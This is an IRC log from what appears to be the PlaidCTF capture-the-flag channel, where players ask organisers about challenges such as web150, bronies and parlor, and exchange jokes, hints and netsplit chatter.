  7265. (03:07:50) ••• jOin: (paul_axe) ([email protected])
  7266. (03:07:57) (paul_axe) hi, who can i ask about reekee?
  7267. (03:09:46) (robbje) who wrote tenement :\
  7268. (03:10:07) (+frozencemetery) paul_axe: pm
  7269. (03:10:28) (+dickoff) tomcr00se: in what song?
  7270. (03:10:33) (+dickoff) robbje: gbarboza
  7271. (03:10:58) ••• jOin: (ggis) ([email protected])
  7272. (03:11:01) (robbje) gbarboza: you avail?
  7273. (03:11:04) (tomcr00se) Life: the biggest troll
  7274. (03:11:16) (+dickoff) robbje: he's probably asleep :/
  7275. (03:11:16) (robbje) oh nvm
  7276. (03:11:21) (robbje) it just dropped the flag
  7277. (03:11:33) (robbje) :>
  7278. (03:11:34) (+dickoff) robbje: :)
  7279. (03:11:35) (poppopret) who can i ask about web150?
  7280. (03:12:43) (+frozencemetery) poppopret: pm
  7281. (03:12:58) (robbje) lol i started 3 exploits, they almost all dropped the flag at the same time :D
  7282. (03:13:33) (+frozencemetery) three exploits is the new seven proxies
  7283. (03:13:54) (+ricky) Try exploting the web!
  7284. (03:15:05) ••• qUit: (nvs) (75d37463@gateway/web/cgi-irc/kiwiirc.com/ip.117.211.116.99) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  7285. (03:17:28) (+ricky) Congrats DS on harry_potter!
  7286. (03:17:32) (+ricky) Now solve the "web"!
  7287. (03:17:48) ••• jOin: (braoru) ([email protected])
  7288. (03:17:55) ••• nIck: (Guest19451) is now known as (dnivra)
  7289. (03:17:59) (hellman) nice on harry
  7290. (03:18:23) ••• qUit: (dnivra) ([email protected]) Quit: dnivra
  7291. (03:18:33) ••• jOin: (dnivra) ([email protected])
  7292. (03:18:34) ••• qUit: (dnivra) ([email protected]) Changing host
  7293. (03:18:34) ••• jOin: (dnivra) (~dnivra@unaffiliated/dnivra)
  7294. (03:18:42) (kiwhacks) can i have hint about web150 ?
  7295. (03:19:39) (almac) kiwhacks: did you see a hint was posted?
  7296. (03:19:46) (houqp_) kiwhacks: there are lots of hints: http://play.plaidctf.com/problems/hints
  7297. (03:19:55) ••• nIck: (64MAAAR6O) is now known as (delusions)
  7298. (03:19:58) (auscompgeek) there are hints!?
  7299. (03:20:10) (+ricky) woo, more web solves - anybody going to get part 2?
  7300. (03:20:16) (almac) http://play.plaidctf.com/problems/hints
  7301. (03:20:18) (kiwhacks) almac, no i have'nt seen :/
  7302. (03:20:37) (almac) there aren't a lot, but it might help some
  7303. (03:20:57) (kiwhacks) thanks, but i'm after this step haha
  7304. (03:20:58) (tomcr00se) why are all hints for problems i solved?
  7305. (03:21:02) (auscompgeek) hmm, which way does the board go on the second half??
  7306. (03:21:12) (tomcr00se) _nightmare_ hint is needed :)
  7307. (03:21:14) (auscompgeek) this board thing is so confusing
  7308. (03:23:35) ••• qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
  7309. (03:23:57) ••• qUit: (CaIlou) ([email protected]) Ping timeout: 258 seconds
  7310. (03:24:29) ••• qUit: (braoru) ([email protected]) Ping timeout: 255 seconds
  7311. (03:24:53) (+dickoff) auscompgeek: http://play.plaidctf.com/rules if you haven't seen it
  7312. (03:25:02) (bool101) grats Dragon Sector on harry_potter
  7313. (03:25:18) (Gynvael) tyty
  7314. (03:25:37) (j00ru) ;]
  7315. (03:25:43) ••• jOin: (Ali) ([email protected])
  7316. (03:25:44) (auscompgeek) dickoff: I looked at that before, but I'm still confused
  7317. (03:26:08) ••• nIck: (Ali) is now known as (Guest48800)
  7318. (03:27:04) ••• jOin: ([pwn]Idolf) ([email protected])
  7319. (03:27:46) ••• qUit: (Guest64110) ([email protected]) Quit: Peace
  7320. (03:28:04) ••• jOin: (_bcc) ([email protected])
  7321. (03:28:17) ••• jOin: (x56) ([email protected])
  7322. (03:30:59) (abcd_) mtpox ?
  7323. (03:32:01) (+ricky) ANNOUNCE: Sorry, once again, please retry your bronies part 1 exploits. We think we fixed a bug that we breaking some attempts.
  7324. (03:32:39) ••• jOin: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
  7325. (03:33:29) ••• jOin: (AlephZero) ([email protected])
  7326. (03:33:54) ••• nIck: (AlephZero) is now known as (Guest76015)
  7327. (03:34:33) ••• jOin: (aer) ([email protected])
  7328. (03:34:35) ••• qUit: (Guest48800) ([email protected]) Ping timeout: 240 seconds
  7329. (03:35:20) ••• jOin: (cool_guy) ([email protected])
  7330. (03:35:30) ••• qUit: (Sin__) ([email protected]) Quit: Sin__
  7331. (03:38:04) ••• jOin: (braoru) ([email protected])
  7332. (03:38:33) (+ricky) Anybody going for bronies 2?
  7333. (03:38:53) (+ricky) It's worth a game-changing amount of points :-P
  7334. (03:39:40) ••• jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
  7335. (03:39:59) ••• jOin: (namrog) ([email protected])
  7336. (03:40:11) (cychao) is Freya (misc250) https server work?
  7337. (03:40:22) (houqp_) frozencemetery: ^
  7338. (03:40:34) (+frozencemetery) cychao: yes, it's working
  7339. (03:41:42) (+frozencemetery) cychao: we have a checker for that one
  7340. (03:41:47) ••• qUit: (7F1AAAJON) ([email protected]) Quit: 7F1AAAJON
  7341. (03:41:59) (cychao) thank you
  7342. (03:42:04) (+frozencemetery) np; good luck :)
  7343. (03:42:26) ••• qUit: (namrog84) ([email protected]) Ping timeout: 276 seconds
  7344. (03:44:27) ••• qUit: (16WAAD6K4) ([email protected]) Quit: Leaving.
  7345. (03:46:35) ••• qUit: (fixception) (322e9f29@gateway/web/freenode/ip.50.46.159.41) Ping timeout: 240 seconds
  7346. (03:47:39) ••• jOin: (chunderstruck1) ([email protected])
  7347. (03:50:45) ••• jOin: (approximatehack) (7aa68c6a@gateway/web/freenode/ip.122.166.140.106)
  7348. (03:52:19) ••• qUit: (ricky) (~ricky@fedora/ricky) Quit: Restarting
  7349. (03:52:42) ••• jOin: (ricky) (~ricky@fedora/ricky)
  7350. (03:52:43) ••• mOde: (ChanServ) sets (+v ricky)
  7351. (03:55:14) (kiwhacks) can i ask somebody in pm about web150 ?
  7352. (03:55:47) (+frozencemetery) kiwhacks: pm
  7353. (03:55:55) (kiwhacks) thanks :)
  7354. (03:56:40) ••• jOin: (nectoo) ([email protected])
  7355. (03:57:14) ••• qUit: (nectoo) ([email protected]) Client Quit
  7356. (03:57:27) (tomcr00se) omg harry potter was actually solved!
  7357. (03:57:37) ••• jOin: (__vitor__) (806f3006@gateway/web/freenode/ip.128.111.48.6)
  7358. (03:58:08) (+ricky) Yup yup
  7359. (03:58:11) (+frozencemetery) umad?
  7360. (03:58:20) (+ricky) You should solve bronies 2 first though :-P
  7361. (03:58:42) (+ricky) It's enterprise grade software
  7362. (03:58:56) ••• jOin: (nvs) (75d37463@gateway/web/cgi-irc/kiwiirc.com/ip.117.211.116.99)
  7363. (03:59:03) ••• jOin: (ZadYree) ([email protected])
  7364. (03:59:46) (tomcr00se) ugh i might still be awake enough to solve cats
  7365. (04:00:00) (tomcr00se) but not pwning
  7366. (04:00:28) (bobsteam) uhg cats
  7367. (04:02:13) ••• jOin: (chrissing) ([email protected])
  7368. (04:03:18) (ryan-c) could some clarification be provided on the algo used by parlor?
  7369. (04:04:30) (hellman) +1
  7370. (04:04:45) (ryan-c) I cannot replicate the results it quotes
  7371. (04:06:29) ••• qUit: (ZadYree) ([email protected]) Ping timeout: 258 seconds
  7372. (04:06:30) ••• qUit: ([2]Knight) ([email protected]) Read error: Connection reset by peer
  7373. (04:06:32) ••• qUit: (chrissing) ([email protected]) Ping timeout: 252 seconds
  7374. (04:08:44) ••• jOin: (elanthia) ([email protected])
  7375. (04:09:58) (pd7) anyone around to answer a question about kpop?
  7376. (04:11:10) ••• jOin: ([1]Knight) ([email protected])
  7377. (04:11:58) (ryan-c) frozencemetery or ricky?
  7378. (04:12:25) (+frozencemetery) ryan-c: sup?
  7379. (04:13:04) ••• qUit: (Guest78627) ([email protected]) Quit: leaving
  7380. (04:13:30) (ryan-c) frozencemetery: The algorithm used by parlor to generate numbers does not appear to match the description. Is this a bug, part of the challenge, or a failing on my part to understand it?
  7381. (04:13:48) ••• jOin: (gameredan) (~gameredan@unaffiliated/gameredan)
  7382. (04:14:16) (+frozencemetery) our crypto people are currently asleep, sorry. We believe it is working as intended based on the POC that we have, but I don't have more information than that
  7383. (04:15:35) ••• qUit: (chunderstruck1) ([email protected]) Ping timeout: 276 seconds
  7384. (04:17:56) ••• iNfo: These users have been split from (#pctf): okami41, pouete, ChanServ, DooMMasteR, Dad`, 64MAAAC71, foundation, hj, justinsteven, bspar, zenofex, f0rki, delusions, doom, dreyer, x6d61726b, stypr, MercX, epochtato, PoopyPantsSr, Aegil, silesm, gbarboza, Dettorer, dug, Zerith, dontpanic42 - check netsplits window for details!
  7385. (04:18:16) (ryan-c) frozencemetery: I just managed to figure it out, pming you.
  7386. (04:18:23) (+frozencemetery) ok
  7387. (04:18:51) ••• mOde: (sendak.freenode.net) sets (+ov ChanServ gbarboza)
  7388. (04:19:11) ••• iNfo: These users have rejoined (#pctf): okami41, pouete, ChanServ, DooMMasteR, Dad`, 64MAAAC71, foundation, hj, justinsteven, bspar, zenofex, f0rki, delusions, doom, dreyer, x6d61726b, stypr, MercX, epochtato, PoopyPantsSr, Aegil, silesm, Dettorer, gbarboza, dug, Zerith, dontpanic42 - check netsplits window for details!
  7389. (04:20:14) (DonnchaC) Can I ask someone something about Web150 in PM?
  7390. (04:20:42) ••• jOin: (Sin__) ([email protected])
  7391. (04:20:49) (+frozencemetery) DonnchaC: pm
  7392. (04:20:49) ••• jOin: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158)
  7393. (04:21:05) (tokki) OMG MISC10 THE MULTIPLICATION THINGY
  7394. (04:21:07) (tokki) I GET IT
  7395. (04:21:13) (tokki) :O
  7396. (04:22:02) ••• jOin: (eZpl0it) ([email protected])
  7397. (04:22:24) (auscompgeek) I KNOW WHAT IT IS, BUT I CAN'T GET IT
  7398. (04:23:52) (pipecork) bummer
  7399. (04:23:55) (tokki) :O
  7400. (04:24:37) (auscompgeek) I'm pretty sure I understand what it is... but I can't seem to get the flag right.
  7401. (04:25:00) (HENLEYbls) Yeah ^^ it's a weird one
  7402. (04:25:46) ••• qUit: (nvs) (75d37463@gateway/web/cgi-irc/kiwiirc.com/ip.117.211.116.99) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  7403. (04:26:13) (21WAAB8NP) give more clear parlor format :(
  7404. (04:27:54) (arthurdent) are we all still definitely 100% sure that rendesvous is working?
  7405. (04:28:09) (houqp_) yes
  7406. (04:28:20) (houqp_) [SH]mom_: just solved it
  7407. (04:28:36) ([SH]mom_) yup, totally works.
  7408. (04:28:57) ••• qUit: (_bcc) ([email protected]) Ping timeout: 250 seconds
  7409. (04:29:15) ([SH]mom_) arthurdent: You must become one with the Onion.
  7410. (04:29:24) (houqp_) heh
  7411. (04:29:36) (houqp_) pm me if you think you have the correct answer
  7412. (04:30:29) ••• jOin: (Stean) ([email protected])
  7413. (04:31:00) (auscompgeek) NO
  7414. (04:31:20) (auscompgeek) DON'T PM houqp_
  7415. (04:31:22) (auscompgeek) :P
  7416. (04:31:26) (houqp_) lol
  7417. (04:31:58) (abcd_) web 150 ?
  7418. (04:32:57) (+frozencemetery) houqp_ is one of us; it's cool
  7419. (04:33:06) (auscompgeek) ah
  7420. (04:33:16) (houqp_) now you can pm me :P
  7421. (04:33:34) (houqp_) only for rendezvous tho
  7422. (04:33:48) ••• jOin: (err0r) ([email protected])
  7423. (04:33:50) ••• jOin: (chunderstruck1) ([email protected])
  7424. (04:34:04) (auscompgeek) wait, why is houqp connected to freenode twice
  7425. (04:34:14) (auscompgeek) and why isn't houqp_ identified
  7426. (04:34:27) (+frozencemetery) auscompgeek: the answer to both questions is "because netsplit"
  7427. (04:35:10) (auscompgeek) frozencemetery: ... right.
  7428. (04:35:29) ••• qUit: (Stean) ([email protected]) Quit: Leaving.
  7429. (04:35:45) (houqp_) because computer is hard
  7430. (04:35:48) (+frozencemetery) auscompgeek: look man, it was trench warfare all over again. Servers dropping, forced renicking... we've seen some shit
  7431. (04:35:54) (+frozencemetery) :)
  7432. (04:36:31) (auscompgeek) lol
  7433. (04:39:36) (+ricky) Anybody going for bronies 2? :-P
  7434. (04:40:00) ••• qUit: (ggis) ([email protected]) Ping timeout: 245 seconds
  7435. (04:40:36) (+ricky) Or bronies 1 for that matter - it should finally be quite solid now
  7436. (04:43:35) (arthurdent) [SH]mom_: i tried becoming one with a couple different onions, but no luck
  7437. (04:44:12) (+ricky) worthless hint: the method to login to eXtreme Secure Solutions Internal Login is *not* brute force!
  7438. (04:44:19) ••• qUit: ([SH]mom_) (~SH][email protected]) Remote host closed the connection
  7439. (04:44:20) ••• qUit: ([SH]mom) ([email protected]) Remote host closed the connection
  7440. (04:45:40) (criple_ripper) ricky it's not?? dammit i was 3.651546+e15 years away from login in :P
  7441. (04:46:17) ••• jOin: (mascot) ([email protected])
  7442. (04:46:29) (+frozencemetery) criple_ripper: jokes on youl we change the password every millenium
  7443. (04:48:16) ••• qUit: (cool_guy) ([email protected]) Ping timeout: 258 seconds
  7444. (04:48:27) ••• qUit: (Barbara_Tracy) ([email protected]) Ping timeout: 250 seconds
  7445. (04:48:27) ([ToH]rbino) is it normal that crypto375 always returns the same now?
  7446. (04:48:45) ••• qUit: (Otacon22) ([email protected]) Ping timeout: 245 seconds
  7447. (04:56:38) ••• jOin: (Dr_Dinosaur) ([email protected])
  7448. (04:56:53) (Dr_Dinosaur) Hello?
  7449. (05:00:01) (chuckleberry) doctor
  7450. (05:00:03) (Sin__) who can i ping on whatscat?
  7451. (05:01:43) ••• jOin: (Otacon22) ([email protected])
  7452. (05:03:21) ••• jOin: (khello) ([email protected])
  7453. (05:03:21) ••• pArt: (mascot) ([email protected])
  7454. (05:03:27) (+frozencemetery) Sin__: pm
  7455. (05:03:33) ••• jOin: (ChakYi) (01ec7e5a@gateway/web/freenode/ip.1.236.126.90)
  7456. (05:03:41) ••• qUit: (hellok) ([email protected]) Ping timeout: 276 seconds
  7457. (05:04:59) ••• qUit: (connection) (~connectio@hacktalk/staff/connection) Ping timeout: 276 seconds
  7458. (05:05:05) (nadar) Is there a reason why rsa is in forensics rather than crypto?
  7459. (05:05:21) ••• nIck: ([1]Knight) is now known as (Knight1)
  7460. (05:05:28) (houqp_) [ToH]rbino: is returning random string to me
  7461. (05:05:36) ••• jOin: (cool_guy) ([email protected])
  7462. (05:06:19) ••• jOin: (n00bz) ([email protected])
  7463. (05:06:24) (n00bz) any help for g++?
  7464. (05:07:38) ••• jOin: (corewar) ([email protected])
  7465. (05:09:26) ••• jOin: (factoreal) ([email protected])
  7466. (05:10:32) ••• qUit: (s_kunk) ([email protected]) Ping timeout: 250 seconds
  7467. (05:11:58) ••• jOin: (s_kunk) ([email protected])
  7468. (05:13:23) ••• jOin: (lermontov) (76f3c5a3@gateway/web/freenode/ip.118.243.197.163)
  7469. (05:13:30) ••• jOin: (corpille) ([email protected])
  7470. (05:13:35) (lermontov) how long $SECRET is in mtpox?
  7471. (05:14:19) (jduck) mov dil, 0xd0
  7472. (05:14:20) (jduck) oops
  7473. (05:15:04) (s_kunk) msg identify nickserv 123456
  7474. (05:15:06) (s_kunk) oopz
  7475. (05:15:40) (jduck) ./dirbuster http://54.198.150.4/
  7476. (05:15:42) (jduck) oops
  7477. (05:15:44) (+ricky) Hahah
  7478. (05:15:53) (s_kunk) hahaha
  7479. (05:16:08) (jduck) <3
  7480. (05:16:48) (architekt) :>
  7481. (05:17:28) ••• qUit: (aer) ([email protected]) Ping timeout: 250 seconds
  7482. (05:17:34) (s_kunk) AnthraX101: ;)
  7483. (05:17:36) (AnthraX101) :P
  7484. (05:20:35) ••• qUit: (lermontov) (76f3c5a3@gateway/web/freenode/ip.118.243.197.163) Ping timeout: 240 seconds
  7485. (05:20:44) ••• qUit: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182) Quit: Page closed
  7486. (05:21:14) ••• jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
  7487. (05:24:05) ••• qUit: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
  7488. (05:24:33) ••• jOin: (cxc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
  7489. (05:24:57) (auscompgeek) jduck: which server is that? ;)
  7490. (05:26:49) ••• jOin: (aer) ([email protected])
  7491. (05:27:04) (jduck) cnn.gov
  7492. (05:27:14) ••• qUit: (nadar) ([email protected]) Remote host closed the connection
  7493. (05:27:35) (n00bz) who i can pm about web300?
  7494. (05:30:25) (+frozencemetery) n00bz: hit me
  7495. (05:32:21) (fasmotol) who can pm me about re250?
  7496. (05:32:46) (fasmotol) *i can pm to
  7497. (05:33:55) ••• jOin: (T1mb0) ([email protected])
  7498. (05:35:58) (Gynvael) who can i pm about pwn1000 ?
  7499. (05:36:03) ••• jOin: (pez) ([email protected])
  7500. (05:36:12) (+ricky) I'm curious about pwn1000 too :-P
  7501. (05:36:17) ••• jOin: (f00b4r_) ([email protected])
  7502. (05:36:29) (Gynvael) ricky: :D
  7503. (05:36:50) ••• qUit: (clockish) ([email protected]) Ping timeout: 276 seconds
  7504. (05:37:02) ••• jOin: (plaintext) ([email protected])
  7505. (05:38:11) ••• qUit: (Apple_Eater) ([email protected]) Ping timeout: 240 seconds
  7506. (05:39:02) ••• jOin: (Digihash) ([email protected])
  7507. (05:39:08) ••• jOin: (Apple_Eater) ([email protected])
  7508. (05:40:35) ••• nIck: (21WAAB8NP) is now known as (hellman_)
  7509. (05:41:32) ••• jOin: (bwn3r) ([email protected])
  7510. (05:41:32) ••• qUit: (bwn3r) ([email protected]) Changing host
  7511. (05:41:32) ••• jOin: (bwn3r) (~n00b13@unaffiliated/nitsua)
  7512. (05:42:01) ••• jOin: (clockish) ([email protected])
  7513. (05:42:14) ••• jOin: (f00b4r__) ([email protected])
  7514. (05:42:30) ••• qUit: (f00b4r_) ([email protected]) Ping timeout: 245 seconds
  7515. (05:42:36) ••• qUit: (abcd_) (7b886a50@gateway/web/freenode/ip.123.136.106.80) Quit: Page closed
  7516. (05:43:27) ••• jOin: (c0ax) ([email protected])
  7517. (05:45:25) ••• jOin: (Bono) (1b7f597e@gateway/web/freenode/ip.27.127.89.126)
  7518. (05:45:35) ••• qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
  7519. (05:46:49) (n00bz) who i can pm about web300?
  7520. (05:47:37) (+frozencemetery) n00bz: hasn't changed; is still me
  7521. (05:47:49) (n00bz) sorry
  7522. (05:48:04) (n00bz) arrow keys trolled me :P
  7523. (05:48:36) (+frozencemetery) no worries :)
  7524. (05:50:03) ••• qUit: (plo) ([email protected]) Ping timeout: 252 seconds
  7525. (05:50:33) (MavJS) /name
  7526. (05:50:38) ••• nIck: (alamar) is now known as (julian)
  7527. (05:51:22) ••• jOin: (plo) ([email protected])
  7528. (05:53:01) ••• qUit: (elanthia) ([email protected]) Quit: leaving
  7529. (05:54:10) ••• jOin: (DeadheadTn) ([email protected])
  7530. (05:55:23) ••• qUit: (bwn3r) (~n00b13@unaffiliated/nitsua) Ping timeout: 240 seconds
  7531. (05:55:42) ••• qUit: (chunderstruck1) ([email protected]) Read error: No route to host
  7532. (05:56:08) ••• jOin: (Ymgve) ([email protected])
  7533. (06:02:30) ••• qUit: (poppopret) ([email protected]) Read error: Connection reset by peer
  7534. (06:02:50) ••• jOin: (chrissing) ([email protected])
  7535. (06:04:17) ••• jOin: (kris) ([email protected])
  7536. (06:07:00) ••• jOin: (kmkz) ([email protected])
  7537. (06:07:05) ••• qUit: (deder) (d4293493@gateway/web/freenode/ip.212.41.52.147) Ping timeout: 240 seconds
  7538. (06:07:30) ••• qUit: (chrissing) ([email protected]) Ping timeout: 245 seconds
  7539. (06:07:48) (auscompgeek) lol
  7540. (06:07:52) (auscompgeek) dem cursor keys
  7541. (06:09:51) (plaintext) so guess which challenge am i working on when my flatmate decides to come into my room at 5 am?
  7542. (06:10:10) (+ricky) Hahaha
  7543. (06:10:30) ••• jOin: (mascot) ([email protected])
  7544. (06:10:31) (+frozencemetery) pro
  7545. (06:10:35) (+dickoff) plaintext: he knows you're a brony now
  7546. (06:10:44) (+dickoff) you'll never convince him otherwise
  7547. (06:10:46) (+ricky) Well, the breakthrough is gone for bronies 1, let's see if anybody gets the 2nd flag :-)
  7548. (06:11:07) (+ricky) You can convince him if you exploit it
  7549. (06:11:37) ••• qUit: (hoxy) (5d53a8a2@gateway/web/freenode/ip.93.83.168.162) Quit: Page closed
  7550. (06:13:41) ••• qUit: (eZpl0it) ([email protected]) Ping timeout: 252 seconds
  7551. (06:13:49) ••• jOin: (Beched) (6daa088b@gateway/web/freenode/ip.109.170.8.139)
  7552. (06:14:30) ••• jOin: (Alii) ([email protected])
  7553. (06:14:52) ••• jOin: (lkwpeter) ([email protected])
  7554. (06:15:07) (zoku) what system is ezhp running?
  7555. (06:15:27) (foundation) x86
  7556. (06:15:33) (zoku) please help a brother outt
  7557. (06:15:42) ••• jOin: (Hertz__) ([email protected])
  7558. (06:15:44) (zoku) yeah, I figured foundation...
  7559. (06:15:50) ••• jOin: (poppopret) ([email protected])
  7560. (06:15:55) (zoku) but, maybe what distro??
  7561. (06:15:55) (foundation) sorry, i had to
  7562. (06:16:13) (zoku) haha, np
  7563. (06:16:43) (+frozencemetery) we have not been distributing that information as far as I know
  7564. (06:16:44) (zoku) I'm sure I could find out but it'd be a PITA
  7565. (06:16:57) (zoku) damn
  7566. (06:18:01) (+ricky) Useless hint: sqlmap should not get you anywhere useful on bronies
  7567. (06:18:01) ••• qUit: (Alii) ([email protected]) Remote host closed the connection
  7568. (06:18:02) ••• qUit: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128) Ping timeout: 246 seconds
  7569. (06:18:39) (+ricky) Also useless: trying every single mid on the pony site
  7570. (06:19:18) ••• qUit: (f00b4r__) ([email protected]) Quit: f00b4r__
  7571. (06:19:54) (nopple) they probably just wanted to look at all of the different captchas
  7572. (06:19:55) (Pitr_) mid as in midi?
  7573. (06:20:31) (+ricky) mid as in message id on the pony site
  7574. (06:21:30) (Hertz__) the site is fucking with me again
  7575. (06:22:23) ••• jOin: (RDot) (2e000ac9@gateway/web/freenode/ip.46.0.10.201)
  7576. (06:22:35) (Beched) RDot: пес
  7577. (06:22:37) ••• jOin: (Alii) ([email protected])
  7578. (06:22:42) (RDot) ы
  7579. (06:24:05) ••• qUit: (cxc7) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
  7580. (06:24:21) (Ymgve) Who can I ask about parlor?
  7581. (06:24:25) ••• qUit: (jarCrack) ([email protected]) Ping timeout: 252 seconds
  7582. (06:24:49) (+frozencemetery) Ymgve: me; pm
  7583. (06:26:35) ••• qUit: (Beched) (6daa088b@gateway/web/freenode/ip.109.170.8.139) Ping timeout: 240 seconds
  7584. (06:27:30) ••• jOin: (Saxophie) ([email protected])
  7585. (06:28:06) (approximatehack) any hints on mtpox?
  7586. (06:28:07) ••• jOin: (f00b4r_) ([email protected])
  7587. (06:28:39) (houqp_) approximatehack: http://play.plaidctf.com/problems/hints
  7588. (06:30:00) ••• jOin: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128)
  7589. (06:30:22) ••• qUit: (Alii) ([email protected]) Remote host closed the connection
  7590. (06:30:52) ••• qUit: (kmkz) ([email protected]) Ping timeout: 245 seconds
  7591. (06:31:23) ••• jOin: (Alii) ([email protected])
  7592. (06:31:23) ••• qUit: (RDot) (2e000ac9@gateway/web/freenode/ip.46.0.10.201) Quit: Page closed
  7593. (06:32:26) (mongo12) remove ponies captcha :'(
  7594. (06:32:32) ••• jOin: (HeartLESS_) (2e000ac9@gateway/web/freenode/ip.46.0.10.201)
  7595. (06:32:38) (+ricky) Hehe
  7596. (06:32:43) (+ricky) I just refresh until I get Princess Celestia
  7597. (06:32:55) (+ricky) (Blame tylerni7 for the awesome captcha :-P)
  7598. (06:33:05) (mongo12) yeah, I've adopted the same technique :p
  7599. (06:33:07) (mongo12) hehe
  7600. (06:33:14) ••• jOin: (xire_) ([email protected])
  7601. (06:35:46) (corpille) who can i pm for bronies ?
  7602. (06:36:12) (houqp_) ricky: ^
  7603. (06:36:12) (Pitr_) keep your bronies in ur pants, bro
  7604. (06:36:17) (poppopret) is the website down?
  7605. (06:36:29) (Pitr_) ricky: you've just created a lot of bronies ..
  7606. (06:36:34) (houqp_) poppopret: refresh harder
  7607. (06:36:44) • Pitr_ is out, daughter needs more ponies
  7608. (06:37:33) ••• jOin: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
  7609. (06:37:49) (+ricky) Hehe
  7610. (06:38:03) (+ricky) Hi corpille
  7611. (06:38:15) • Pitr_ makes a mental note to create a Juggalo-inspired challenge next time he organizes a CTF
  7612. (06:38:27) (Pitr_) People like juggalo's more than bronies
  7613. (06:39:23) (+frozencemetery) D: juggalos
  7614. (06:39:57) (corpille) Hi ricky i pm you ;)
  7615. (06:43:12) ••• jOin: (rokko) (5775c785@gateway/web/freenode/ip.87.117.199.133)
  7616. (06:43:12) (+frozencemetery) ooh, BlueLotus got freya :D
  7617. (06:43:57) (auscompgeek) freenode's interserver lag is killing me
  7618. (06:45:35) (Pitr_) how many hours left?
  7619. (06:46:16) (pez) Pitr_: i guess 9h and 14 mins ?
  7620. (06:48:29) ••• jOin: (ggis) ([email protected])
  7621. (06:49:02) ••• jOin: (kmkz) ([email protected])
  7622. (06:49:05) (rokko) who's an author of whatcats? :/
  7623. (06:49:30) (Pitr_) pez: cool! :D
  7624. (06:49:39) ••• jOin: (nateloaf) ([email protected])
  7625. (06:50:25) ••• jOin: (r1cky) ([email protected])
  7626. (06:50:35) ••• qUit: (ChakYi) (01ec7e5a@gateway/web/freenode/ip.1.236.126.90) Ping timeout: 240 seconds
  7627. (06:51:27) (cool_guy) server down
  7628. (06:51:29) • +ricky wonders if anybody is anywhere on bronies 2 :-P
  7629. (06:51:48) ••• qUit: (phiber__) ([email protected]) Read error: Connection reset by peer
  7630. (06:51:50) (+ricky) cool_guy: Can you try refreshing? I know it's a little flakey around now
  7631. (06:53:43) ••• jOin: (wheee) (75600123@gateway/web/freenode/ip.117.96.1.35)
  7632. (06:54:37) ••• jOin: (hu) ([email protected])
  7633. (06:55:20) (+ricky) OK, website should be a little better now
  7634. (06:55:45) ••• pArt: (epochtato) (~epochfail@ec2-54-252-29-104.ap-southeast-2.compute.amazonaws.com) "WeeChat 0.3.7"
  7635. (06:56:50) ••• qUit: (Digihash) ([email protected]) Remote host closed the connection
  7636. (06:58:00) ••• jOin: (shik) ([email protected])
  7637. (06:58:44) (cool_guy) yaa.. its running now
  7638. (06:59:44) (wtbw) this may be a silly question, but how on earth does the movement work on the playboard?
  7639. (06:59:56) (wtbw) I have no idea how we just ended up on chance
  7640. (07:00:18) (wtbw) it's not even within 6 squares of the last spot!
  7641. (07:00:19) ••• jOin: (Tapyroe__) ([email protected])
  7642. (07:00:27) (auscompgeek) wtbw: the 1-6 wheel thing determines tiles you... wut
  7643. (07:00:32) (+frozencemetery) wtbw: squares with problems that are open are not counted
  7644. (07:00:42) (wtbw) frozencemetery: ahh that makes sense!
  7645. (07:00:46) (+frozencemetery) :)
  7646. (07:00:49) (auscompgeek) frozencemetery: NOW YOU TELL US!?
  7647. (07:00:55) (poppopret) is doge_stege supposed to be this hard? or am i getting tunnel vision
  7648. (07:01:13) (wtbw) frozencemetery: thanks
  7649. (07:01:46) ••• jOin: (sqrts|stephan) ([email protected])
  7650. (07:02:15) (+ricky) Yuh-oh, Dragon Sector is catching up!
  7651. (07:02:22) (+frozencemetery) auscompgeek: I would hope that would have been observed already since this is our second trip around the board? That said, I am not frontend and did not make the site :)
  7652. (07:03:39) (+ricky) Hey Dragon Sector: May I suggest bronies to get you guys in first? :-P
  7653. (07:03:54) (_blasty_) :-\
  7654. (07:04:13) (sven) guess it's time to wake up and solve something again :-D
  7655. (07:04:25) (+frozencemetery) or go all the way old school - so old school it's new school - and worship the norse gods >:D
  7656. (07:04:27) (+ricky) I also recommend it to 0xffa if the want to maintain their first place :-)
  7657. (07:04:30) (wtbw) who wrote graphs btw?
  7658. (07:04:37) (_blasty_) I RECOMMEND NOT PUTTING OUT 800 PTS WEB CHALLENGES
  7659. (07:04:37) (_blasty_) FFS
  7660. (07:04:38) (_blasty_) :P
  7661. (07:04:43) • +ricky advertises his problem equally to all teamss
  7662. (07:04:57) (+ricky) "Web" is my favorite category!
  7663. (07:05:29) (wtbw) I vote for a new category of "complexity theory" for problems like graphs
  7664. (07:05:31) (wtbw) I want more of those
  7665. (07:05:32) (wtbw) ;)
  7666. (07:05:36) ••• qUit: (wheee) (75600123@gateway/web/freenode/ip.117.96.1.35) Ping timeout: 240 seconds
  7667. (07:05:38) (foundation) see , now you made _blasty_ angry. now he's gonna write in full caps for the rest of the game
  7668. (07:05:39) (+ricky) wtbw: I think it was tylerni7
  7669. (07:05:47) (wtbw) ricky: oh that would make sense
  7670. (07:06:13) (auscompgeek) I'm confused, where's my team on the board
  7671. (07:06:34) (auscompgeek) wait, is the board shared across teams?
  7672. (07:06:42) ••• jOin: (`Peluche) ([email protected])
  7673. (07:07:01) (auscompgeek) nobody explained this very well
  7674. (07:07:07) ••• jOin: (Digihash) ([email protected])
  7675. (07:07:10) (houqp_) yes
  7676. (07:07:28) (wtbw) oh the board is shared??
  7677. (07:07:48) (houqp_) god, you finally notice it
